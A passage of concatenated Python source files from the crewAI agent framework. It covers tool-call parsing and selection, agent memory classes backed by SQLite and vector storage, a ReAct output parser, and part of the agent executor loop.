(it only ever returns None) data = { "result": result, "tool_name": tool.name, "tool_args": calling.arguments, } if ( hasattr(original_tool, "result_as_answer") and original_tool.result_as_answer # type: ignore # Item "None" of "Any | None" has no attribute "cache_function" ): result_as_answer = original_tool.result_as_answer # type: ignore # Item "None" of "Any | None" has no attribute "result_as_answer" data["result_as_answer"] = result_as_answer self.agent.tools_results.append(data) return result # type: ignore # No return value expected def _format_result(self, result: Any) -> None: self.task.used_tools += 1 if self._should_remember_format(): # type: ignore # "_should_remember_format" of "ToolUsage" does not return a value (it only ever returns None) result = self._remember_format(result=result) # type: ignore # "_remember_format" of "ToolUsage" does not return a value (it only ever returns None) return result def _should_remember_format(self) -> bool: return self.task.used_tools % self._remember_format_after_usages == 0 def _remember_format(self, result: str) -> None: result = str(result) result += "\n\n" + self._i18n.slice("tools").format( tools=self.tools_description, tool_names=self.tools_names ) return 
result # type: ignore # No return value expected def _check_tool_repeated_usage( self, calling: Union[ToolCalling, InstructorToolCalling] ) -> None: if not self.tools_handler: return False # type: ignore # No return value expected if last_tool_usage := self.tools_handler.last_used_tool: return (calling.tool_name == last_tool_usage.tool_name) and ( # type: ignore # No return value expected calling.arguments == last_tool_usage.arguments ) def _select_tool(self, tool_name: str) -> BaseTool: order_tools = sorted( self.tools, key=lambda tool: SequenceMatcher( None, tool.name.lower().strip(), tool_name.lower().strip() ).ratio(), reverse=True, ) for tool in order_tools: if ( tool.name.lower().strip() == tool_name.lower().strip() or SequenceMatcher( None, tool.name.lower().strip(), tool_name.lower().strip() ).ratio() > 0.85 ): return tool self.task.increment_tools_errors() if tool_name and tool_name != "": raise Exception( f"Action '{tool_name}' don't exist, these are the only available Actions:\n {self.tools_description}" ) else: raise Exception( f"I forgot the Action name, these are the only available Actions: {self.tools_description}" ) def _render(self) -> str: """Render the tool name and description in plain text.""" descriptions = [] for tool in self.tools: args = { k: {k2: v2 for k2, v2 in v.items() if k2 in ["description", "type"]} for k, v in tool.args.items() } descriptions.append( "\n".join( [ f"Tool Name: {tool.name.lower()}", f"Tool Description: {tool.description}", f"Tool Arguments: {args}", ] ) ) return "\n--\n".join(descriptions) def _is_gpt(self, llm) -> bool: return isinstance(llm, ChatOpenAI) and llm.openai_api_base is None def _tool_calling( self, tool_string: str ) -> Union[ToolCalling, InstructorToolCalling]: try: if self.function_calling_llm: model = ( InstructorToolCalling if self._is_gpt(self.function_calling_llm) else ToolCalling ) converter = Converter( text=f"Only tools available:\n###\n{self._render()}\n\nReturn a valid schema for the tool, the tool name must be exactly equal one of the options, use this text to inform the valid output schema:\n\n{tool_string}```", llm=self.function_calling_llm, model=model, instructions=dedent( """\ The schema should have the following structure, only two keys: - tool_name: str - arguments: dict (with all arguments being passed) Example: {"tool_name": "tool name", "arguments": {"arg_name1": "value", "arg_name2": 2}}""", ), max_attempts=1, ) calling = converter.to_pydantic() if isinstance(calling, ConverterError): raise calling else: tool_name = self.action.tool tool = self._select_tool(tool_name) try: tool_input = self._validate_tool_input(self.action.tool_input) arguments = ast.literal_eval(tool_input) except Exception: return ToolUsageErrorException( # type: ignore # Incompatible return value type (got "ToolUsageErrorException", expected "ToolCalling | InstructorToolCalling") f'{self._i18n.errors("tool_arguments_error")}' ) if not isinstance(arguments, dict): return ToolUsageErrorException( # type: ignore # Incompatible return value type (got "ToolUsageErrorException", expected "ToolCalling | InstructorToolCalling") f'{self._i18n.errors("tool_arguments_error")}' ) calling = ToolCalling( tool_name=tool.name, arguments=arguments, log=tool_string, # type: ignore ) except Exception as e: self._run_attempts += 1 if self._run_attempts > self._max_parsing_attempts: self._telemetry.tool_usage_error(llm=self.function_calling_llm) self.task.increment_tools_errors() if self.agent.verbose: self._printer.print(content=f"\n\n{e}\n", color="red") 
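                # Parsing attempts exhausted: return the formatted error (rather than
                # raising) so the agent can see it and adjust its next tool call.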
return ToolUsageErrorException( # type: ignore # Incompatible return value type (got "ToolUsageErrorException", expected "ToolCalling | InstructorToolCalling") f'{self._i18n.errors("tool_usage_error").format(error=e)}\nMoving on then. {self._i18n.slice("format").format(tool_names=self.tools_names)}' ) return self._tool_calling(tool_string) return calling def _validate_tool_input(self, tool_input: str) -> str: try: ast.literal_eval(tool_input) return tool_input except Exception: # Clean and ensure the string is properly enclosed in braces tool_input = tool_input.strip() if not tool_input.startswith("{"): tool_input = "{" + tool_input if not tool_input.endswith("}"): tool_input += "}" # Manually split the input into key-value pairs entries = tool_input.strip("{} ").split(",") formatted_entries = [] for entry in entries: if ":" not in entry: continue # Skip malformed entries key, value = entry.split(":", 1) # Remove extraneous white spaces and quotes, replace single quotes key = key.strip().strip('"').replace("'", '"') value = value.strip() # Handle replacement of single quotes at the start and end of the value string if value.startswith("'") and value.endswith("'"): value = value[1:-1] # Remove single quotes value = ( '"' + value.replace('"', '\\"') + '"' ) # Re-encapsulate with double quotes elif value.isdigit(): # Check if value is a digit, hence integer value = value elif value.lower() in [ "true", "false", "null", ]: # Check for boolean and null values value = value.lower() else: # Assume the value is a string and needs quotes value = '"' + value.replace('"', '\\"') + '"' # Rebuild the entry with proper quoting formatted_entry = f'"{key}": {value}' formatted_entries.append(formatted_entry) # Reconstruct the JSON string new_json_string = "{" + ", ".join(formatted_entries) + "}" return new_json_string File: src/crewai/tools/agent_tools.py from langchain.tools import StructuredTool from crewai.agents.agent_builder.utilities.base_agent_tool import BaseAgentTools class AgentTools(BaseAgentTools): """Default tools around agent delegation""" def tools(self): coworkers = ", ".join([f"{agent.role}" for agent in self.agents]) tools = [ StructuredTool.from_function( func=self.delegate_work, name="Delegate work to coworker", description=self.i18n.tools("delegate_work").format( coworkers=coworkers ), ), StructuredTool.from_function( func=self.ask_question, name="Ask question to coworker", description=self.i18n.tools("ask_question").format(coworkers=coworkers), ), ] return tools File: src/crewai/tools/tool_calling.py from typing import Any, Dict, Optional from pydantic import BaseModel, Field from pydantic import BaseModel as PydanticBaseModel from pydantic import Field as PydanticField class ToolCalling(BaseModel): tool_name: str = Field(..., description="The name of the tool to be called.") arguments: Optional[Dict[str, Any]] = Field( ..., description="A dictionary of arguments to be passed to the tool." ) class InstructorToolCalling(PydanticBaseModel): tool_name: str = PydanticField( ..., description="The name of the tool to be called." ) arguments: Optional[Dict[str, Any]] = PydanticField( ..., description="A dictionary of arguments to be passed to the tool." ) File: src/crewai/types/__init__.py File: src/crewai/types/usage_metrics.py from pydantic import BaseModel, Field class UsageMetrics(BaseModel): """ Model to track usage metrics for the crew's execution. Attributes: total_tokens: Total number of tokens used. prompt_tokens: Number of tokens used in prompts. 
completion_tokens: Number of tokens used in completions. successful_requests: Number of successful requests made. """ total_tokens: int = Field(default=0, description="Total number of tokens used.") prompt_tokens: int = Field( default=0, description="Number of tokens used in prompts." ) completion_tokens: int = Field( default=0, description="Number of tokens used in completions." ) successful_requests: int = Field( default=0, description="Number of successful requests made." ) def add_usage_metrics(self, usage_metrics: "UsageMetrics"): """ Add the usage metrics from another UsageMetrics object. Args: usage_metrics (UsageMetrics): The usage metrics to add. """ self.total_tokens += usage_metrics.total_tokens self.prompt_tokens += usage_metrics.prompt_tokens self.completion_tokens += usage_metrics.completion_tokens self.successful_requests += usage_metrics.successful_requests File: src/crewai/memory/memory.py from typing import Any, Dict, Optional from crewai.memory.storage.interface import Storage class Memory: """ Base class for memory, now supporting agent tags and generic metadata. """ def __init__(self, storage: Storage): self.storage = storage def save( self, value: Any, metadata: Optional[Dict[str, Any]] = None, agent: Optional[str] = None, ) -> None: metadata = metadata or {} if agent: metadata["agent"] = agent self.storage.save(value, metadata) def search(self, query: str) -> Dict[str, Any]: return self.storage.search(query) File: src/crewai/memory/__init__.py from .entity.entity_memory import EntityMemory from .long_term.long_term_memory import LongTermMemory from .short_term.short_term_memory import ShortTermMemory __all__ = ["EntityMemory", "LongTermMemory", "ShortTermMemory"] File: src/crewai/memory/short_term/short_term_memory.py from typing import Any, Dict, Optional from crewai.memory.memory import Memory from crewai.memory.short_term.short_term_memory_item import ShortTermMemoryItem from crewai.memory.storage.rag_storage import RAGStorage class ShortTermMemory(Memory): """ ShortTermMemory class for managing transient data related to immediate tasks and interactions. Inherits from the Memory class and utilizes an instance of a class that adheres to the Storage for data storage, specifically working with MemoryItem instances. """ def __init__(self, crew=None, embedder_config=None): storage = RAGStorage( type="short_term", embedder_config=embedder_config, crew=crew ) super().__init__(storage) def save( self, value: Any, metadata: Optional[Dict[str, Any]] = None, agent: Optional[str] = None, ) -> None: item = ShortTermMemoryItem(data=value, metadata=metadata, agent=agent) super().save(value=item.data, metadata=item.metadata, agent=item.agent) def search(self, query: str, score_threshold: float = 0.35): return self.storage.search(query=query, score_threshold=score_threshold) # type: ignore # BUG? 
The reference is to the parent class, but the parent class does not have this parameters def reset(self) -> None: try: self.storage.reset() except Exception as e: raise Exception( f"An error occurred while resetting the short-term memory: {e}" ) File: src/crewai/memory/short_term/__init__.py File: src/crewai/memory/short_term/short_term_memory_item.py from typing import Any, Dict, Optional class ShortTermMemoryItem: def __init__( self, data: Any, agent: Optional[str] = None, metadata: Optional[Dict[str, Any]] = None, ): self.data = data self.agent = agent self.metadata = metadata if metadata is not None else {} File: src/crewai/memory/long_term/long_term_memory_item.py from typing import Any, Dict, Optional, Union class LongTermMemoryItem: def __init__( self, agent: str, task: str, expected_output: str, datetime: str, quality: Optional[Union[int, float]] = None, metadata: Optional[Dict[str, Any]] = None, ): self.task = task self.agent = agent self.quality = quality self.datetime = datetime self.expected_output = expected_output self.metadata = metadata if metadata is not None else {} File: src/crewai/memory/long_term/__init__.py File: src/crewai/memory/long_term/long_term_memory.py from typing import Any, Dict from crewai.memory.long_term.long_term_memory_item import LongTermMemoryItem from crewai.memory.memory import Memory from crewai.memory.storage.ltm_sqlite_storage import LTMSQLiteStorage class LongTermMemory(Memory): """ LongTermMemory class for managing cross runs data related to overall crew's execution and performance. Inherits from the Memory class and utilizes an instance of a class that adheres to the Storage for data storage, specifically working with LongTermMemoryItem instances. """ def __init__(self): storage = LTMSQLiteStorage() super().__init__(storage) def save(self, item: LongTermMemoryItem) -> None: # type: ignore # BUG?: Signature of "save" incompatible with supertype "Memory" metadata = item.metadata metadata.update({"agent": item.agent, "expected_output": item.expected_output}) self.storage.save( # type: ignore # BUG?: Unexpected keyword argument "task_description","score","datetime" for "save" of "Storage" task_description=item.task, score=metadata["quality"], metadata=metadata, datetime=item.datetime, ) def search(self, task: str, latest_n: int = 3) -> Dict[str, Any]: return self.storage.load(task, latest_n) # type: ignore # BUG?: "Storage" has no attribute "load" def reset(self) -> None: self.storage.reset() File: src/crewai/memory/contextual/__init__.py File: src/crewai/memory/contextual/contextual_memory.py from typing import Optional from crewai.memory import EntityMemory, LongTermMemory, ShortTermMemory class ContextualMemory: def __init__(self, stm: ShortTermMemory, ltm: LongTermMemory, em: EntityMemory): self.stm = stm self.ltm = ltm self.em = em def build_context_for_task(self, task, context) -> str: """ Automatically builds a minimal, highly relevant set of contextual information for a given task. """ query = f"{task.description} {context}".strip() if query == "": return "" context = [] context.append(self._fetch_ltm_context(task.description)) context.append(self._fetch_stm_context(query)) context.append(self._fetch_entity_context(query)) return "\n".join(filter(None, context)) def _fetch_stm_context(self, query) -> str: """ Fetches recent relevant insights from STM related to the task's description and expected_output, formatted as bullet points. 
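
        Returns a "Recent Insights:" bullet list built from the short-term
        memory search results, or an empty string when nothing matches.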
""" stm_results = self.stm.search(query) formatted_results = "\n".join([f"- {result}" for result in stm_results]) return f"Recent Insights:\n{formatted_results}" if stm_results else "" def _fetch_ltm_context(self, task) -> Optional[str]: """ Fetches historical data or insights from LTM that are relevant to the task's description and expected_output, formatted as bullet points. """ ltm_results = self.ltm.search(task, latest_n=2) if not ltm_results: return None formatted_results = [ suggestion for result in ltm_results for suggestion in result["metadata"]["suggestions"] # type: ignore # Invalid index type "str" for "str"; expected type "SupportsIndex | slice" ] formatted_results = list(dict.fromkeys(formatted_results)) formatted_results = "\n".join([f"- {result}" for result in formatted_results]) # type: ignore # Incompatible types in assignment (expression has type "str", variable has type "list[str]") return f"Historical Data:\n{formatted_results}" if ltm_results else "" def _fetch_entity_context(self, query) -> str: """ Fetches relevant entity information from Entity Memory related to the task's description and expected_output, formatted as bullet points. """ em_results = self.em.search(query) formatted_results = "\n".join( [f"- {result['context']}" for result in em_results] # type: ignore # Invalid index type "str" for "str"; expected type "SupportsIndex | slice" ) return f"Entities:\n{formatted_results}" if em_results else "" File: src/crewai/memory/entity/entity_memory.py from crewai.memory.entity.entity_memory_item import EntityMemoryItem from crewai.memory.memory import Memory from crewai.memory.storage.rag_storage import RAGStorage class EntityMemory(Memory): """ EntityMemory class for managing structured information about entities and their relationships using SQLite storage. Inherits from the Memory class. """ def __init__(self, crew=None, embedder_config=None): storage = RAGStorage( type="entities", allow_reset=False, embedder_config=embedder_config, crew=crew, ) super().__init__(storage) def save(self, item: EntityMemoryItem) -> None: # type: ignore # BUG?: Signature of "save" incompatible with supertype "Memory" """Saves an entity item into the SQLite storage.""" data = f"{item.name}({item.type}): {item.description}" super().save(data, item.metadata) def reset(self) -> None: try: self.storage.reset() except Exception as e: raise Exception(f"An error occurred while resetting the entity memory: {e}") File: src/crewai/memory/entity/__init__.py File: src/crewai/memory/entity/entity_memory_item.py class EntityMemoryItem: def __init__( self, name: str, type: str, description: str, relationships: str, ): self.name = name self.type = type self.description = description self.metadata = {"relationships": relationships} File: src/crewai/memory/storage/interface.py from typing import Any, Dict class Storage: """Abstract base class defining the storage interface""" def save(self, value: Any, metadata: Dict[str, Any]) -> None: pass def search(self, key: str) -> Dict[str, Any]: # type: ignore pass def reset(self) -> None: pass File: src/crewai/memory/storage/ltm_sqlite_storage.py import json import sqlite3 from typing import Any, Dict, List, Optional, Union from crewai.utilities import Printer from crewai.utilities.paths import db_storage_path class LTMSQLiteStorage: """ An updated SQLite storage class for LTM data storage. 
""" def __init__( self, db_path: str = f"{db_storage_path()}/long_term_memory_storage.db" ) -> None: self.db_path = db_path self._printer: Printer = Printer() self._initialize_db() def _initialize_db(self): """ Initializes the SQLite database and creates LTM table """ try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute( """ CREATE TABLE IF NOT EXISTS long_term_memories ( id INTEGER PRIMARY KEY AUTOINCREMENT, task_description TEXT, metadata TEXT, datetime TEXT, score REAL ) """ ) conn.commit() except sqlite3.Error as e: self._printer.print( content=f"MEMORY ERROR: An error occurred during database initialization: {e}", color="red", ) def save( self, task_description: str, metadata: Dict[str, Any], datetime: str, score: Union[int, float], ) -> None: """Saves data to the LTM table with error handling.""" try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute( """ INSERT INTO long_term_memories (task_description, metadata, datetime, score) VALUES (?, ?, ?, ?) """, (task_description, json.dumps(metadata), datetime, score), ) conn.commit() except sqlite3.Error as e: self._printer.print( content=f"MEMORY ERROR: An error occurred while saving to LTM: {e}", color="red", ) def load( self, task_description: str, latest_n: int ) -> Optional[List[Dict[str, Any]]]: """Queries the LTM table by task description with error handling.""" try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute( f""" SELECT metadata, datetime, score FROM long_term_memories WHERE task_description = ? ORDER BY datetime DESC, score ASC LIMIT {latest_n} """, (task_description,), ) rows = cursor.fetchall() if rows: return [ { "metadata": json.loads(row[0]), "datetime": row[1], "score": row[2], } for row in rows ] except sqlite3.Error as e: self._printer.print( content=f"MEMORY ERROR: An error occurred while querying LTM: {e}", color="red", ) return None def reset( self, ) -> None: """Resets the LTM table with error handling.""" try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute("DELETE FROM long_term_memories") conn.commit() except sqlite3.Error as e: self._printer.print( content=f"MEMORY ERROR: An error occurred while deleting all rows in LTM: {e}", color="red", ) return None File: src/crewai/memory/storage/kickoff_task_outputs_storage.py import json import sqlite3 from typing import Any, Dict, List, Optional from crewai.task import Task from crewai.utilities import Printer from crewai.utilities.crew_json_encoder import CrewJSONEncoder from crewai.utilities.paths import db_storage_path class KickoffTaskOutputsSQLiteStorage: """ An updated SQLite storage class for kickoff task outputs storage. 
""" def __init__( self, db_path: str = f"{db_storage_path()}/latest_kickoff_task_outputs.db" ) -> None: self.db_path = db_path self._printer: Printer = Printer() self._initialize_db() def _initialize_db(self): """ Initializes the SQLite database and creates LTM table """ try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute( """ CREATE TABLE IF NOT EXISTS latest_kickoff_task_outputs ( task_id TEXT PRIMARY KEY, expected_output TEXT, output JSON, task_index INTEGER, inputs JSON, was_replayed BOOLEAN, timestamp DATETIME DEFAULT CURRENT_TIMESTAMP ) """ ) conn.commit() except sqlite3.Error as e: self._printer.print( content=f"SAVING KICKOFF TASK OUTPUTS ERROR: An error occurred during database initialization: {e}", color="red", ) def add( self, task: Task, output: Dict[str, Any], task_index: int, was_replayed: bool = False, inputs: Dict[str, Any] = {}, ): try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute( """ INSERT OR REPLACE INTO latest_kickoff_task_outputs (task_id, expected_output, output, task_index, inputs, was_replayed) VALUES (?, ?, ?, ?, ?, ?) """, ( str(task.id), task.expected_output, json.dumps(output, cls=CrewJSONEncoder), task_index, json.dumps(inputs), was_replayed, ), ) conn.commit() except sqlite3.Error as e: self._printer.print( content=f"SAVING KICKOFF TASK OUTPUTS ERROR: An error occurred during database initialization: {e}", color="red", ) def update( self, task_index: int, **kwargs, ): """ Updates an existing row in the latest_kickoff_task_outputs table based on task_index. """ try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() fields = [] values = [] for key, value in kwargs.items(): fields.append(f"{key} = ?") values.append( json.dumps(value, cls=CrewJSONEncoder) if isinstance(value, dict) else value ) query = f"UPDATE latest_kickoff_task_outputs SET {', '.join(fields)} WHERE task_index = ?" values.append(task_index) cursor.execute(query, tuple(values)) conn.commit() if cursor.rowcount == 0: self._printer.print( f"No row found with task_index {task_index}. No update performed.", color="red", ) except sqlite3.Error as e: self._printer.print(f"UPDATE KICKOFF TASK OUTPUTS ERROR: {e}", color="red") def load(self) -> Optional[List[Dict[str, Any]]]: try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute(""" SELECT * FROM latest_kickoff_task_outputs ORDER BY task_index """) rows = cursor.fetchall() results = [] for row in rows: result = { "task_id": row[0], "expected_output": row[1], "output": json.loads(row[2]), "task_index": row[3], "inputs": json.loads(row[4]), "was_replayed": row[5], "timestamp": row[6], } results.append(result) return results except sqlite3.Error as e: self._printer.print( content=f"LOADING KICKOFF TASK OUTPUTS ERROR: An error occurred while querying kickoff task outputs: {e}", color="red", ) return None def delete_all(self): """ Deletes all rows from the latest_kickoff_task_outputs table. 
""" try: with sqlite3.connect(self.db_path) as conn: cursor = conn.cursor() cursor.execute("DELETE FROM latest_kickoff_task_outputs") conn.commit() except sqlite3.Error as e: self._printer.print( content=f"ERROR: Failed to delete all kickoff task outputs: {e}", color="red", ) File: src/crewai/memory/storage/rag_storage.py import contextlib import io import logging import os import shutil from typing import Any, Dict, List, Optional from embedchain import App from embedchain.llm.base import BaseLlm from embedchain.models.data_type import DataType from embedchain.vectordb.chroma import InvalidDimensionException from crewai.memory.storage.interface import Storage from crewai.utilities.paths import db_storage_path @contextlib.contextmanager def suppress_logging( logger_name="chromadb.segment.impl.vector.local_persistent_hnsw", level=logging.ERROR, ): logger = logging.getLogger(logger_name) original_level = logger.getEffectiveLevel() logger.setLevel(level) with contextlib.redirect_stdout(io.StringIO()), contextlib.redirect_stderr( io.StringIO() ), contextlib.suppress(UserWarning): yield logger.setLevel(original_level) class FakeLLM(BaseLlm): pass class RAGStorage(Storage): """ Extends Storage to handle embeddings for memory entries, improving search efficiency. """ def __init__(self, type, allow_reset=True, embedder_config=None, crew=None): super().__init__() if ( not os.getenv("OPENAI_API_KEY") and not os.getenv("OPENAI_BASE_URL") == "https://api.openai.com/v1" ): os.environ["OPENAI_API_KEY"] = "fake" agents = crew.agents if crew else [] agents = [self._sanitize_role(agent.role) for agent in agents] agents = "_".join(agents) config = { "app": { "config": {"name": type, "collect_metrics": False, "log_level": "ERROR"} }, "chunker": { "chunk_size": 5000, "chunk_overlap": 100, "length_function": "len", "min_chunk_size": 150, }, "vectordb": { "provider": "chroma", "config": { "collection_name": type, "dir": f"{db_storage_path()}/{type}/{agents}", "allow_reset": allow_reset, }, }, } if embedder_config: config["embedder"] = embedder_config self.type = type self.app = App.from_config(config=config) self.app.llm = FakeLLM() if allow_reset: self.app.reset() def _sanitize_role(self, role: str) -> str: """ Sanitizes agent roles to ensure valid directory names. 
""" return role.replace("\n", "").replace(" ", "_").replace("/", "_") def save(self, value: Any, metadata: Dict[str, Any]) -> None: self._generate_embedding(value, metadata) def search( # type: ignore # BUG?: Signature of "search" incompatible with supertype "Storage" self, query: str, limit: int = 3, filter: Optional[dict] = None, score_threshold: float = 0.35, ) -> List[Any]: with suppress_logging(): try: results = ( self.app.search(query, limit, where=filter) if filter else self.app.search(query, limit) ) except InvalidDimensionException: self.app.reset() return [] return [r for r in results if r["metadata"]["score"] >= score_threshold] def _generate_embedding(self, text: str, metadata: Dict[str, Any]) -> Any: self.app.add(text, data_type=DataType.TEXT, metadata=metadata) def reset(self) -> None: try: shutil.rmtree(f"{db_storage_path()}/{self.type}") except Exception as e: raise Exception( f"An error occurred while resetting the {self.type} memory: {e}" ) File: src/crewai/agents/__init__.py from .cache.cache_handler import CacheHandler from .executor import CrewAgentExecutor from .parser import CrewAgentParser from .tools_handler import ToolsHandler __all__ = ["CacheHandler", "CrewAgentExecutor", "CrewAgentParser", "ToolsHandler"] File: src/crewai/agents/parser.py import re from typing import Any, Union from json_repair import repair_json from langchain.agents.output_parsers import ReActSingleInputOutputParser from langchain_core.agents import AgentAction, AgentFinish from langchain_core.exceptions import OutputParserException from crewai.utilities import I18N FINAL_ANSWER_ACTION = "Final Answer:" MISSING_ACTION_AFTER_THOUGHT_ERROR_MESSAGE = "I did it wrong. Invalid Format: I missed the 'Action:' after 'Thought:'. I will do right next, and don't use a tool I have already used.\n" MISSING_ACTION_INPUT_AFTER_ACTION_ERROR_MESSAGE = "I did it wrong. Invalid Format: I missed the 'Action Input:' after 'Action:'. I will do right next, and don't use a tool I have already used.\n" FINAL_ANSWER_AND_PARSABLE_ACTION_ERROR_MESSAGE = "I did it wrong. Tried to both perform Action and give a Final Answer at the same time, I must do one or the other" class CrewAgentParser(ReActSingleInputOutputParser): """Parses ReAct-style LLM calls that have a single tool input. Expects output to be in one of two formats. If the output signals that an action should be taken, should be in the below format. This will result in an AgentAction being returned. Thought: agent thought here Action: search Action Input: what is the temperature in SF? If the output signals that a final answer should be given, should be in the below format. This will result in an AgentFinish being returned. 
Thought: agent thought here Final Answer: The temperature is 100 degrees """ _i18n: I18N = I18N() agent: Any = None def parse(self, text: str) -> Union[AgentAction, AgentFinish]: includes_answer = FINAL_ANSWER_ACTION in text regex = ( r"Action\s*\d*\s*:[\s]*(.*?)[\s]*Action\s*\d*\s*Input\s*\d*\s*:[\s]*(.*)" ) action_match = re.search(regex, text, re.DOTALL) if action_match: if includes_answer: raise OutputParserException( f"{FINAL_ANSWER_AND_PARSABLE_ACTION_ERROR_MESSAGE}: {text}" ) action = action_match.group(1) clean_action = self._clean_action(action) action_input = action_match.group(2).strip() tool_input = action_input.strip(" ").strip('"') safe_tool_input = self._safe_repair_json(tool_input) return AgentAction(clean_action, safe_tool_input, text) elif includes_answer: return AgentFinish( {"output": text.split(FINAL_ANSWER_ACTION)[-1].strip()}, text ) if not re.search(r"Action\s*\d*\s*:[\s]*(.*?)", text, re.DOTALL): self.agent.increment_formatting_errors() raise OutputParserException( f"Could not parse LLM output: `{text}`", observation=f"{MISSING_ACTION_AFTER_THOUGHT_ERROR_MESSAGE}\n{self._i18n.slice('final_answer_format')}", llm_output=text, send_to_llm=True, ) elif not re.search( r"[\s]*Action\s*\d*\s*Input\s*\d*\s*:[\s]*(.*)", text, re.DOTALL ): self.agent.increment_formatting_errors() raise OutputParserException( f"Could not parse LLM output: `{text}`", observation=MISSING_ACTION_INPUT_AFTER_ACTION_ERROR_MESSAGE, llm_output=text, send_to_llm=True, ) else: format = self._i18n.slice("format_without_tools") error = f"{format}" self.agent.increment_formatting_errors() raise OutputParserException( error, observation=error, llm_output=text, send_to_llm=True, ) def _clean_action(self, text: str) -> str: """Clean action string by removing non-essential formatting characters.""" return re.sub(r"^\s*\*+\s*|\s*\*+\s*$", "", text).strip() def _safe_repair_json(self, tool_input: str) -> str: UNABLE_TO_REPAIR_JSON_RESULTS = ['""', "{}"] # Skip repair if the input starts and ends with square brackets # Explanation: The JSON parser has issues handling inputs that are enclosed in square brackets ('[]'). # These are typically valid JSON arrays or strings that do not require repair. Attempting to repair such inputs # might lead to unintended alterations, such as wrapping the entire input in additional layers or modifying # the structure in a way that changes its meaning. By skipping the repair for inputs that start and end with # square brackets, we preserve the integrity of these valid JSON structures and avoid unnecessary modifications. if tool_input.startswith("[") and tool_input.endswith("]"): return tool_input # Before repair, handle common LLM issues: # 1. 
Replace """ with " to avoid JSON parser errors tool_input = tool_input.replace('"""', '"') result = repair_json(tool_input) if result in UNABLE_TO_REPAIR_JSON_RESULTS: return tool_input return str(result) File: src/crewai/agents/tools_handler.py from typing import Any, Optional, Union from ..tools.cache_tools import CacheTools from ..tools.tool_calling import InstructorToolCalling, ToolCalling from .cache.cache_handler import CacheHandler class ToolsHandler: """Callback handler for tool usage.""" last_used_tool: ToolCalling = {} # type: ignore # BUG?: Incompatible types in assignment (expression has type "Dict[...]", variable has type "ToolCalling") cache: Optional[CacheHandler] def __init__(self, cache: Optional[CacheHandler] = None): """Initialize the callback handler.""" self.cache = cache self.last_used_tool = {} # type: ignore # BUG?: same as above def on_tool_use( self, calling: Union[ToolCalling, InstructorToolCalling], output: str, should_cache: bool = True, ) -> Any: """Run when tool ends running.""" self.last_used_tool = calling # type: ignore # BUG?: Incompatible types in assignment (expression has type "Union[ToolCalling, InstructorToolCalling]", variable has type "ToolCalling") if self.cache and should_cache and calling.tool_name != CacheTools().name: self.cache.add( tool=calling.tool_name, input=calling.arguments, output=output, ) File: src/crewai/agents/executor.py import threading import time from typing import Any, Dict, Iterator, List, Literal, Optional, Tuple, Union import click from langchain.agents import AgentExecutor from langchain.agents.agent import ExceptionTool from langchain.callbacks.manager import CallbackManagerForChainRun from langchain.chains.summarize import load_summarize_chain from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain_core.agents import AgentAction, AgentFinish, AgentStep from langchain_core.exceptions import OutputParserException from langchain_core.tools import BaseTool from langchain_core.utils.input import get_color_mapping from pydantic import InstanceOf from crewai.agents.agent_builder.base_agent_executor_mixin import CrewAgentExecutorMixin from crewai.agents.tools_handler import ToolsHandler from crewai.tools.tool_usage import ToolUsage, ToolUsageErrorException from crewai.utilities import I18N from crewai.utilities.constants import TRAINING_DATA_FILE from crewai.utilities.exceptions.context_window_exceeding_exception import ( LLMContextLengthExceededException, ) from crewai.utilities.logger import Logger from crewai.utilities.training_handler import CrewTrainingHandler class CrewAgentExecutor(AgentExecutor, CrewAgentExecutorMixin): _i18n: I18N = I18N() should_ask_for_human_input: bool = False llm: Any = None iterations: int = 0 task: Any = None tools_description: str = "" tools_names: str = "" original_tools: List[Any] = [] crew_agent: Any = None crew: Any = None function_calling_llm: Any = None request_within_rpm_limit: Any = None tools_handler: Optional[InstanceOf[ToolsHandler]] = None max_iterations: Optional[int] = 15 have_forced_answer: bool = False force_answer_max_iterations: Optional[int] = None # type: ignore # Incompatible types in assignment (expression has type "int | None", base class "CrewAgentExecutorMixin" defined the type as "int") step_callback: Optional[Any] = None system_template: Optional[str] = None prompt_template: Optional[str] = None response_template: Optional[str] = None _logger: Logger = Logger() _fit_context_window_strategy: Optional[Literal["summarize"]] = "summarize" def 
_call( self, inputs: Dict[str, str], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Dict[str, Any]: """Run text through and get agent response.""" # Construct a mapping of tool name to tool for easy lookup name_to_tool_map = {tool.name: tool for tool in self.tools} # We construct a mapping from each tool to a color, used for logging. color_mapping = get_color_mapping( [tool.name.casefold() for tool in self.tools], excluded_colors=["green", "red"], ) intermediate_steps: List[Tuple[AgentAction, str]] = [] # Allowing human input given task setting if self.task and self.task.human_input: self.should_ask_for_human_input = True # Let's start tracking the number of iterations and time elapsed self.iterations = 0 time_elapsed = 0.0 start_time = time.time() # We now enter the agent loop (until it returns something). while self._should_continue(self.iterations, time_elapsed): if not self.request_within_rpm_limit or self.request_within_rpm_limit(): next_step_output = self._take_next_step( name_to_tool_map, color_mapping, inputs, intermediate_steps, run_manager=run_manager, ) if self.step_callback: self.step_callback(next_step_output) if isinstance(next_step_output, AgentFinish): # Creating long term memory create_long_term_memory = threading.Thread( target=self._create_long_term_memory, args=(next_step_output,) ) create_long_term_memory.start() return self._return( next_step_output, intermediate_steps, run_manager=run_manager ) intermediate_steps.extend(next_step_output) if len(next_step_output) == 1: next_step_action = next_step_output[0] # See if tool should return directly tool_return = self._get_tool_return(next_step_action) if tool_return is not None: return self._return( tool_return, intermediate_steps, run_manager=run_manager ) self.iterations += 1 time_elapsed = time.time() - start_time output = self.agent.return_stopped_response( self.early_stopping_method, intermediate_steps, **inputs ) return self._return(output, intermediate_steps, run_manager=run_manager) def _iter_next_step( self, name_to_tool_map: Dict[str, BaseTool], color_mapping: Dict[str, str], inputs: Dict[str, str], intermediate_steps: List[Tuple[AgentAction, str]], run_manager: Optional[CallbackManagerForChainRun] = None, ) -> Iterator[Union[AgentFinish, AgentAction, AgentStep]]: """Take a single step in the thought-action-observation loop. Override this to take control of how the agent makes and acts on choices. """ try: if self._should_force_answer(): error = self._i18n.errors("force_final_answer") 